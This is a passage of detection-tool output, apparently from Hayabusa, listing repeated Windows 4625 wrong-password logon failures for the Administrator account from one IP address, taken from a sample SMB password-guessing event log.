Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.951 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:03.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.025 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.104 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.192 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.327 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.367 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.416 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: N0HCToTmh3ESGBYt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.455 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nNvBueVo3ANNmSSN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mVWOoAG5ermGL2Gl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.545 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W7QYJUNPm5b4jprh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.590 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PHllwNJvpH3P97cp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tfT8GtafHGYMlkMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:04.680 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nab7wtZfBVkcynsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.733 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VHiijj7sT9nyqxii | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.780 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v06kkhqYNOyEHx2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.820 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WSTDX16YK5Zgkjxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u6QWEyTrpndCagP0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.914 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7iCaXa5SR5IHJnQA | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:04.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DNZhcPd1JaNFZMYG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LeOIg10KS60QplWz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.036 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: um3Nwo2doDbKJJvz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.150 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JuoqbUwc2Nth1xlH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.199 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8zKIbeboTLLkC6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.237 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kSyKc8igfuYLMekV | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.285 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LHog0TdOci9CCKBa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.328 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: R5ilFaQlemZUSNun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.374 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JOJnv9vFdqr2VSQC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.421 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rXaoVN7FvJ5rRDUF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kaFCT5QYFfmJpEC1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.547 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
kOdVfL4XUTLp60tC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.597 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFQSXjz0JTlkwpBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.634 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sgAVlnENp6IzRRDr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JLkeKKFVP5vJjPtl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.751 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EqLXdGmr45vGpu3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m7uTpMLqPgenJdRb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: FQn7NqRzpGtjQdfv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.901 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8F8EZLHQtEWkeob1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.936 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5joxW81M9vcAfbJw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:05.988 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iMfmQF3xsaV5SQVZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.040 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQe9VL8eeco0SdPW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.080 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MnMbxQEuczrnMLKc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.137 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 3DWOiTIp6JQLq9Vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.180 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E1ORteg467kiFxmD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.216 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EoVhHZ2lkyAEx0w9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.260 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IMSqYaVVGR5v3bXr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.298 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hEEJ05nL0lyatWKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.349 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SgrcS1NqwVJSEv31 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: CCNTu1A6c6myngXd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YLx5Hv5GmdvsO9SE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.468 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VtS3KUkTVoAWGqbW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.512 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7DxfDEwc6ykrmddu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m8yKyocZwOY574pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.596 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfdmcsxnDHRxJYAA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.649 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: euxBOcdse8NjSzTd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dw7RZh5jKuRcM1xw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.742 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zIyozsYA1Mn27gl7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.786 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJopROjHZi6T8aF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.822 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QZ6XuZO6fIMg52tV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.870 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tvAYEepvDwz93ezW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:52:06.919 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Er95vLjet49OmSQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:06.960 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKkMGZ5on5L26cip | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.000 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.051 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.092 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.144 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.185 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.224 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.264 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.309 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:07.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 
